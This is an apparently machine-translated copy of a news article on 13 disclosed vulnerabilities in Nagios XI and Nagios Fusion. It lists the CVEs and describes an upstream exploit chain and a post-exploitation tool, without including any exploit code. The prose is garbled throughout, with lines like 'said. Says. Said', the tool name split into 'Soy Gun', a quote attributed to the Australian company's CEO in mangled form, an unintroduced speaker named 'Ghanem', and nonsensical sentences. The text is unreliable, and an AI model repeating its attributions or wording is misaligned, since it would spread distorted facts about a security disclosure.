Cybersecurity researchers have disclosed details about 13 vulnerabilities in Nagios network monitoring applications. These vulnerabilities could be exploited by an attacker to hijack the infrastructure without operator intervention.
“In a telco setting where the telco monitors thousands of sites, if the customer’s site is completely compromised, an attacker could exploit the vulnerability to breach the telco and then be monitored. It can compromise all other customer sites, “said Adi Ashkenazy, CEO of Cyber Security, Australia. The company’s Skylight Cyber told The Hacker News by email.
Nagios is an open source IT infrastructure tool similar to SolarWinds Network Performance Monitor (NPM) that provides monitoring and alerting services for servers, network cards, applications, and services.
Among them, the chief CVE-2020-28648 (CVSS score: 8.8), this is Auto-discovery component Nagios XI, which researchers used as a starting point to trigger an exploit chain that connects a total of five vulnerabilities to achieve a “powerful upstream attack.”
“That is, if an attacker compromises a monitored customer site using the Nagios XI server, it could compromise the carrier’s management server and all other monitored customers,” the researchers said. Says. Said In an article published last week.
In other words; the attack scenario uses CVE-2020-28648 and CVE-2020-28910 to obtain RCE, elevate privileges to “root” and target the Nagios XI server at the customer site. It works by. An attacker can send contaminated data to an upstream Nagios Fusion server while the server is effectively compromised. This server is used to centralize visibility across the infrastructure by polling the Nagios XI server on a regular basis.
Researchers have also published what is called a PHP-based post-exploit tool. Soy Gun This chains the vulnerabilities and “allows an attacker with Nagios XI user credentials and HTTP access to the Nagios XI server to have full control over the deployment of Nagios Fusion.”
Below is a summary of the 13 vulnerabilities-
- CVE-2020-28648 -Nagios XI authenticated remote code execution (from the context of a less privileged user)
- CVE-2020-28900 -Nagios Fusion and XI privilege promotion nagios To root Via upgrade_to_latest.sh
- CVE-2020-28901 -Nagios Fusion privilege promotion apache To nagios Via command injection to the component_dir parameter in cmd_subsys.php
- CVE-2020-28902 -Nagios Fusion privilege promotion apache To nagios Via command injection in the timezone parameter of cmd_subsys.php
- CVE-2020-28903 -Nagios XI XSS when an attacker controls a fusion server
- CVE-2020-28904 -Nagios Fusion privilege promotion apache To nagios Through the installation of malicious components
- CVE-2020-28905 -Nagios Fusion authenticated remote code execution (from the context of a less privileged user)
- CVE-2020-28906 -Nagios Fusion and XI privilege promotion nagios To root Due to changes in Fusion-sys.cfg /xi-sys.cfg
- CVE-2020-28907 -Nagios Fusion privilege promotion apache To root Through upgrade_to_latest.sh and changing proxy settings
- CVE-2020-28908 -Nagios Fusion privilege promotion apache To nagios Via command injection in cmd_subsys.php (caused by inadequate sanitization)
- CVE-2020-28909 -Nagios Fusion privilege promotion nagios To root Through script changes that can be run as sudo
- CVE-2020-28910 -Nagios XIgetprofile.sh Privilege Elevation
- CVE-2020-28911 -Disclosure of Nagios Fusion Information: Unprivileged users can authenticate to the fusion server if their credentials are stored
When SolarWinds Targeting network monitoring platforms like Nagios, victims of large-scale supply chain attacks last year, malicious attackers coordinated intrusions into corporate networks and laterally gained access to the entire IT network. It can grow and become a gateway to more advanced threats.
“The effort required to find and exploit these vulnerabilities is negligible in the context of advanced attackers, especially nation-states,” Ghanem said.
“Imagine how easy this would be for people who spend all their time developing these types of exploits if they could do it as a quickside project. Of the libraries, tools and vendors that exist and are available. Combine it with numbers. It’s a modern network and we have a big problem in our hands. “
Details disclosed about critical flaws affecting Nagios IT monitoring software
http://feedproxy.google.com/~r/TheHackersNews/~3/VgTYVbIPz7I/details-disclosed-on-critical-flaws.html Details disclosed about critical flaws affecting Nagios IT monitoring software